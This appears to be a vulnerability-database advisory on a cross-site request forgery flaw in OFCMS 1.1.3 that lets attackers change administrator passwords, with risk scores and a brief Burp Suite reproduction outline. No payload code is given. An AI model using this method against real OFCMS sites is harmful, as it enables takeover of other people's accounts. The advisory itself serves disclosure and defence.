Primary

Context

OFCMS Cross-Site Request Forgery Vulnerability

Vulnerability

A cross-site request forgery (CSRF) vulnerability has been identified in OFCMS version 1.1.3. The issue arises from an unknown function, allowing remote attackers to manipulate requests and potentially change sensitive information, such as administrator passwords.

Impact

Exploitation of this vulnerability allows for cross-site request forgery, where an attacker can trick a user into performing actions they did not intend to, such as changing passwords or other personal information.

Reproduction

To reproduce this vulnerability, intercept a request to change a password using a tool like Burp Suite. Modify the request to include a CSRF payload, then send it. This will simulate a user clicking a link that performs the action, resulting in a successful password change.

Added: Jun 9, 2025, 7:46 PM

Updated: Jun 9, 2025, 7:46 PM

Vulnerability Rating

Custom Algorithm

spread

0.0

impact

5.0

exploitability

5.8

remediation

0.0

relevance

0.0

threat

6.4

urgency

2.9

incentive

1.7

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.

Vulnerability Rating

Custom Algorithm

spread

0.0

impact

5.0

exploitability

5.8

remediation

0.0

relevance

0.0

threat

6.4

urgency

2.9

incentive

1.7

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.

OFCMS Cross-Site Request Forgery Vulnerability

Vulnerability

Impact

Reproduction

Affected Products

OFCMS

CVSS Scores

References

Vulnerability Rating

Vulnerability Rating